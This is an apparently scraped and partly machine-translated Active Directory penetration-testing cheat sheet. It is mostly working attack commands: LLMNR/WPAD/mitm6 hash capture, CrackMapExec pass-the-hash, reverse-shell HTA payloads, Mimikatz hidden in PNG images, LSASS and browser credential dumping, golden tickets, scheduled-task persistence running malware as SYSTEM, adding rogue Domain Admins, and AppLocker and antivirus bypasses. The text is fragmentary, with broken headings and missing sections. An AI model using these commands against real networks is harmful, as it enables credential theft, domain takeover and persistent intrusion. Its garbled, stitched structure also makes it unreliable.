# Get Current Domain Info - Similar to Get-Domain [System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()
# Get Domain Trust Info - Similar to Get-DomainTrust ([System.DirectoryServices.ActiveDirectory.Domain]::GetCurrentDomain()).GetAllTrustRelationships()
# View Domain Info [System.DirectoryServices.ActiveDirectory.Forest]::GetCurrentForest()
# View Domain Trust Information ([System.DirectoryServices.ActiveDirectory.Forest]::GetForest((New-Object System.DirectoryServices.ActiveDirectory.DirectoryContext('Forest', 'forest-of-interest.local')))).GetAllTrustRelationships()
LLMNR and NBT-NS is usually on by default and there purpose is to act as a fallback to DNS. i/e if you search \\HRServer\ but it dosent exist, Windows (by default) will send out a LLMNR broadcast across the network. By using Responder we can respond to these broadcasts and say something like
'Yeah I'm HRServer, authenticate to me and I will get a NTLMv2 hash which I can crack or relay. More on relaying below'
3.2 Responder WPAD Attack
1 2 3 4 5 6 7
responder -I eth0 wpad
By default, Windows is configured to search for a Web Proxy Auto-Discovery file when using the internet
Go to internet explorer and search for Google which automatically searches for a WPAD file...
Then take NTLMv2 hash and NTLM Relay it or send to cracking rig.
3.3 mitm6
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16
#Use when WPAD attack is not working, this uses IPv6 and DNS to relay creds to a target.
By default IPV6 should be enabled. git clone https://github.com/fox-it/mitm6.git cd /opt/tools/mitm6 pip install .
mitm6 -d m0chanAD.local
Now the vuln occurs, Windows prefers IPV6 over IPv4 meaning DNS = controlled by attacker.
CrackMapExec is installed on Kali or get Windows Binary from Github.
Has 3 Execution Methods crackmapexec smb <- Creating and Running a Service over SMB crackmapexec wmi <- Executes command over WMI crackmapexec at <- Schedules Task with Task Scheduler
Can execute plain commands with -X flag i/e
crcakmapexec smb 10.10.14.0/24 -x whoami
crcakmapexec smb 10.10.14.0/24 <- Host Discovery crackmapexec smb 10.10.14.0/24 -u user -p 'Password' crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --pass-pol crackmapexec smb 10.10.14.0/24 -u user -p 'Password' --shares
Can also PTH with CME
crackmapexec smb 10.10.14.0/24 -u user -H e8bcd502fbbdcd9379305dca15f4854e
python3 --help python3 weirdhta.py 10.10.10.10 4444 --normal (for normal powershell reverse_shell) python3 weirdhta.py 10.10.10.10 4444 --smb (without powershell payload, it will use smb) python3 weirdhta.py 10.10.10.10 4444 --powercat (for powercat) python3 weirdhta.py 10.10.10.10 4444 --command 'c:\windows\system32\cmd.exe' (custom command)
3.16 EvilWinRM
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
#https://github.com/Hackplayers/evil-winrm
Ultimate Shell for WinRM Connections
Usage: evil-winrm -i IP -u USER [-s SCRIPTS_PATH] [-e EXES_PATH] [-P PORT] [-p PASS] [-U URL] [-S] [-c PUBLIC_KEY_PATH ] [-k PRIVATE_KEY_PATH ] -S, --ssl Enable SSL -c, --pub-key PUBLIC_KEY_PATH Local path to public key certificate -k, --priv-key PRIVATE_KEY_PATH Local path to private key certificate -s, --scripts PS_SCRIPTS_PATH Powershell scripts local path -e, --executables EXES_PATH C# executables local path -i, --ip IP Remote host IP or hostname (required) -U, --url URL Remote url endpoint (default /wsman) -u, --user USER Username (required) -p, --password PASS Password -P, --port PORT Remote host port (default 5985) -V, --version Show version -h, --help Display this help message
3.17 GetVulnerableGPO
1 2 3
#https://github.com/gpoguy/GetVulnerableGPO
PowerShell script to find 'vulnerable' security-related GPOs that should be hardened (for more background, see the GPO discoverability section of this blog: https://sdmsoftware.com/group-policy-blog/security-related/security-fun-bloodhound-ms16-072-gpo-discoverability/) Requires GPMC & SDM Software GPMC PowerShell Module (used to more easily parse GP settings during the search): https://s3.amazonaws.com/sdmsoftware.com/dl/SDM-GPMC-Module2.0Setup.zip
3.18 Invoke-PSImage
1 2 3 4 5 6 7 8 9 10 11 12 13 14
#https://github.com/peewpw/Invoke-PSImage
Encodes a PowerShell script in the pixels of a PNG file and generates a oneliner to execute
Invoke-PSImage takes a PowerShell script and encodes the bytes of the script into the pixels of a PNG image. It generates a oneliner for executing either from a file of from the web.
PS>Import-Module .\Invoke-PSImage.ps1 PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg [Oneliner to execute from a file] PS>Import-Module .\Invoke-PSImage.ps1 PS>Invoke-PSImage -Script .\Invoke-Mimikatz.ps1 -Out .\evil-kiwi.png -Image .\kiwi.jpg -WebRequest [Oneliner to execute from the web]
systeminfo wmic qfe net users hostname whoami net localgroups echo %logonserver% netsh firewall show state netsh firewall show config netstat -an type C:\Windows\system32\drivers\etc\hosts
Ofc the above requires access to Port 88 on the DC but you can always port forward if executing GetUserSPNs.py manually.
https://github.com/GhostPack/SharpRoast --NOW Deprecated-- and incorproated into Rebeus with the kerberoast action
4.28 用Python编写的
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17
#https://github.com/skelsec/kerberoast
IMPORTANT: the accepted formats are the following <ldap_connection_string> : <domainname>/<username>/<secret_type>:<secret>@<DC_ip> <kerberos_connection_string>: <kerberos realm>/<username>/<secret_type>:<secret>@<DC_ip>
Look for vulnerable users via LDAP kerberoast ldap all <ldap_connection_string> -o ldapenum
Use ASREP roast against users in the ldapenum_asrep_users.txt file kerberoast asreproast <DC_ip> -t ldapenum_asrep_users.txt
Use SPN roast against users in the ldapenum_spn_users.txt file kerberoast spnroast <kerberos_connection_string> -t ldapenum_spn_users.txt
4.29 代表烘焙
1 2 3 4 5 6 7
#Accounts have to have DONT_REQ_PREAUTH explicitly set for them to be vulnerable
Get-ASRepHash -Domain m0chanAD.local -User victim
Can also use Rebeus (Reflectively Load .NET Assembly.)
.\Rubeus.exe asreproast
4.30DCSync(也用于后期利用)
1 2 3 4 5 6 7 8 9 10
#Special rights are required to run DCSync. Any member of Administrators, Domain Admins, or Enterprise Admins as well as Domain Controller computer accounts are able to run DCSync to pull password data. Note that Read-Only Domain Controllers are not allowed to pull password data for users by default.
#and anyone with the Replicating Changes permissions set to Allow (i.e., Replicating Changes All/Replicating Directory Changes)
This is stupidily good, it can literally Enum everything you require and is also a .NET Assembly so can be reflectively loaded to avoid AV :D Win Win
BasicOSInfo - Basic OS info (i.e. architecture, OS version, etc.) RebootSchedule - Reboot schedule (last 15 days) based on event IDs 12 and 13 TokenGroupPrivs - Current process/token privileges (e.g. SeDebugPrivilege/etc.) UACSystemPolicies - UAC system policies via the registry PowerShellSettings - PowerShell versions and security settings AuditSettings - Audit settings via the registry WEFSettings - Windows Event Forwarding (WEF) settings via the registry LSASettings - LSA settings (including auth packages) UserEnvVariables - Current user environment variables SystemEnvVariables - Current system environment variables UserFolders - Folders in C:\Users\ NonstandardServices - Services with file info company names that don't contain 'Microsoft' InternetSettings - Internet settings including proxy configs LapsSettings - LAPS settings, if installed LocalGroupMembers - Members of local admins, RDP, and DCOM MappedDrives - Mapped drives RDPSessions - Current incoming RDP sessions WMIMappedDrives - Mapped drives via WMI NetworkShares - Network shares FirewallRules - Deny firewall rules, "full" dumps all AntiVirusWMI - Registered antivirus (via WMI) InterestingProcesses - "Interesting" processes- defensive products and admin tools RegistryAutoRuns - Registry autoruns RegistryAutoLogon - Registry autologon information DNSCache - DNS cache entries (via WMI) ARPTable - Lists the current ARP table and adapter information (equivalent to arp -a) AllTcpConnections - Lists current TCP connections and associated processes AllUdpConnections - Lists current UDP connections and associated processes NonstandardProcesses - Running processeswith file info company names that don't contain 'Microsoft' * If the user is in high integrity, the following additional actions are run: SysmonConfig - Sysmon configuration from the registry
Can also run Mimikatz.exe after some AV Evasion removing strings etc. ippSec has a great tutorial on this.
mimikatz.exe privlege::debug sekurlsa::logonPasswords full
The safer method is to dump the process memory of LSASS.exe with MiniDump (https://github.com/3xpl01tc0d3r/Minidump)
(or) https://github.com/GhostPack/SharpDump
and send the .bin to Mimikatz locally.
sekurlsa::minidump C:\users\m0chan\lssas.dmp
Can also be used for dumping and pass the ticket attacks but will cover this elsewhere.
Mimikatz Guide
#Logon Sessions
sekurlsa::logonPasswords all
#Dump Cache
lsadump::cache
#Dump SAM
lsadump::sam
5.6 Dump Creds #2
1 2 3 4 5
#https://github.com/AlessandroZ/LaZagne
laZagne.exe all laZagne.exe browsers laZagne.exe browsers -firefox
5.7 SessionGopher
1 2 3 4 5 6 7 8 9 10
#https://github.com/Arvanaghi/SessionGopher
Quietly digging up saved session information for PuTTY, WinSCP, FileZilla, SuperPuTTY, and RDP
SessionGopher is a PowerShell tool that finds and decrypts saved session information for remote access tools. It has WMI functionality built in so it can be run remotely. Its best use case is to identify systems that may connect to Unix systems, jump boxes, or point-of-sale terminals
mimikittenz is a post-exploitation powershell tool that utilizes the Windows function ReadProcessMemory() in order to extract plain-text passwords from various target processes.
The aim of mimikittenz is to provide user-level (non-admin privileged) sensitive data extraction in order to maximise post exploitation efforts and increase value of information gathered per target.
KeeTheft.exe, Microsoft.Diagnostics.Runtime.dll & KeePatched.exe can also be used.
5.11 pypykatz
1 2 3 4 5
#https://github.com/skelsec/pypykatz
Full python implementation of Mimikatz :D
pip3 install pypykatz
5.12 SafetyKatz
1 2 3 4 5 6 7
#https://github.com/GhostPack/SafetyKatz
Full C Sharp Implemenatation of Mimikatz that can be reflectively loaded :D
"SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtee's .NET PE Loader.
First, the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file, removing the file after execution is complete."
5.13 SharpDPAPI
1 2 3
#https://github.com/GhostPack/SharpDPAPI
Full C Sharp Implementation of Mimikatzs DPAPI features which allows access to DPAPI features.
5.14 SharpSniper
1 2 3 4 5 6 7 8 9
#https://github.com/HunnicCyber/SharpSniper
Often a Red Team engagement is more than just achieving Domain Admin. Some clients will want to see if specific users in the domain can be compromised, for example the CEO.
SharpSniper is a simple tool to find the IP address of these users so that you can target their box.
SharpLocker helps get current user credentials by popping a fake Windows lock screen, all output is sent to Console which works perfect for Cobalt Strike.
5.16 Check for Missing KB’s
1 2 3 4 5 6 7 8
watson.exe Sherlock.ps1
Use Watson.exe Assembly and reflectively load .NET Assembly into memory to avoid antivirus.
More at the bottom re. Reflectively Loading stuff. (Also does not hurt to change certain strings etc)
cipher /c "d:\Users\Gentil Kiwi\Documents\m0chan.txt" - View if File is EFS Encrypted and whom can Decrypt, sometimes Impersonating a token is easier than manually decrying with mimikatz.
#Check my Blog Post Kerberos Attacks in Depth for Further Information #https://m0chan.github.io/Kerberos-Attacks-In-Depth
# To generate the TGT with NTLM mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /rc4:<krbtgt_ntlm_hash> /user:<user_name>
# To generate the TGT with AES 128 key mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes128:<krbtgt_aes128_key> /user:<user_name>
# To generate the TGT with AES 256 key (more secure encryption, probably more stealth due is the used by default by Microsoft) mimikatz # kerberos::golden /domain:<domain_name>/sid:<domain_sid> /aes256:<krbtgt_aes256_key> /user:<user_name>
# Inject TGT with Mimikatz mimikatz # kerberos::ptt <ticket_kirbi_file>
#Inject Ticket with Rebeus .\Rubeus.exe ptt /ticket:<ticket_kirbi_file>
Domain = Logical group of objects (users, computers, servers etc etc) supported from a central location like a DC
Tree = Set of domains using same name space (DNS Name)
Trust = Agreement between 2 domains that allow cross-domain access to resources etc. i/e Michelle@dev.m0chan.com may be able to access resources inside HR.m0chan.com.
Forest = Largest Structure composed of all trees.
Most trees are linked with dual sided trust relationships to allow for sharing of resources.
By default the first domain created if the Forest Root.
Lets say we have owned a domain controller and got the KRBTGT Hash (The keys to the castle) we can now create
See there github linked above for full Syntax, very cool work
6.3 SharpDoor
1 2 3 4 5
#https://github.com/infosecn1nja/SharpDoor.git
SharpDoor is alternative RDPWrap written in C# to allowed multiple RDP (Remote Desktop) sessions by patching termsrv.dll file, for opsec considerations SharpDoor still using cmd.exe to run sc services to impersonating as trustedinstaller in the future will be avoiding cmd.exe usage, currently only support for Windows 10.
# Run Malware.exe every day at 06:00am schtasks /create /tn "SoftwareUpdate" /tr C:\Temp\SoftwareUpdate\Malware.exe /sc daily /st 06:00
# Runs a task each time the user's session is idle for 5 minutes. schtasks /create /tn "SoftwareUpdate" /tr C:\Temp\SoftwareUpdate\Malware.exe /sc onidle /i 5
# Runs a a task as SYSTEM when User Logs in. schtasks /create /ru "NT AUTHORITY\SYSTEM" /rp "" /tn "SoftwareUpdate" /tr C:\Temp\SoftwareUpdate\Malware.exe /sc onlogon
6.7 Windows启动文件夹
1 2 3 4 5
This has been around for years as basically every version of Windows contains a startup folder.
Windows 10 - C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
Current User Startup - C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
6.8 EXE / DLL劫持
1 2 3
Look for any missing DLL's or EXE's that common programs are calling on startup and over write them with your payload/malware.
Also if you are localadmin/system you could provide over write a normal service binary or DLL, providing you don't break the execution.
6.9 添加用户帐号
1 2 3 4
net user m0chan /add /domain net group "Domain Admins" m0chan /add /domain net localgroup "Administrators" /add net user m0chan /domain /comment:"Your Blueteam Fucking Sucks"
6.10 Kerberos的持久性
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15
We can dump Kerberos tickets and inject them in session when deemed relevant however tickets have a low life span unless explically requested for 7 days.
They can be injected into session with mimikatz or Rebeus.
But let's say we have pwned a DC and got the KRBTGT Hash we can generate a golden ticket with a 10 year life span.
fromport: the port number to listen on, e.g. 80 fromip: the ip address to listen on, e.g. 192.168.1.1 toport: the port number to forward to toip: the ip address to forward to
All SSL Connections will be redirected to 202.54.1.5:443
#Non SSL Port Forward socat TCP-LISTEN:80,fork TCP:202.54.1.5:80
7.5 SharpExec
1 2 3 4 5 6 7 8 9 10 11
#https://github.com/anthemtotheego/SharpExec
C# Implementation of Conventional Lateral Movement Techniques, such as
-WMIExec - Semi-Interactive shell that runs as the user. Best described as a less mature version of Impacket's wmiexec.py tool.
-SMBExec - Semi-Interactive shell that runs as NT Authority\System. Best described as a less mature version of Impacket's smbexec.py tool.
-PSExec (like functionality) - Gives the operator the ability to execute remote commands as NT Authority\System or upload a file and execute it with or without arguments as NT Authority\System.
-WMI - Gives the operator the ability to execute remote commands as the user or upload a file and execute it with or without arguments as the user.
Downgrading to PS Version 2 circumvates Constrained Mode
powershell.exe -version 2
Verifiy versions with $PSVersionTable Get-Host
9.5 AppLocker COR配置文件绕过
1 2 3 4 5 6 7
set COR_ENABLE_PROFILING=1 COR_PROFILER={cf0d821e-299b-5307-a3d8-b283c03916db} set COR_PROFILER_PATH=C:\Users\m0chan\pwn\reverseshell.dll tzsync powershell
Where .DLL is your payload i/e reverse shell, beacon etc.
9.6 MSBuild Powershell / CMD旁路
1 2 3 4 5 6 7 8 9
You can use this if cmd is not disabled but powershell is
Also https://gist.github.com/NickTyrer/92344766f1d4d48b15687e5e4bf6f93c
MSBuild PSAttack :D :D
9.7 PSAttack
1 2 3 4 5
#https://github.com/jaredhaight/PSAttack
Use if Powershell.exe is not available. this does not rely on powershell.exe, but Instead directly calls powershell through .NET Framework circumvating most application whitelisting etc.
Has numerous modules prebuilt in and is built in C Sharp / .NET so can be reflectively loaded :)
9.8 NoPowerShell
1 2 3
#https://github.com/bitsadmin/nopowershell
Primiarily to be used with Cobalt & Execute Assembly but can also be reflectively loaded from any other C2 infra.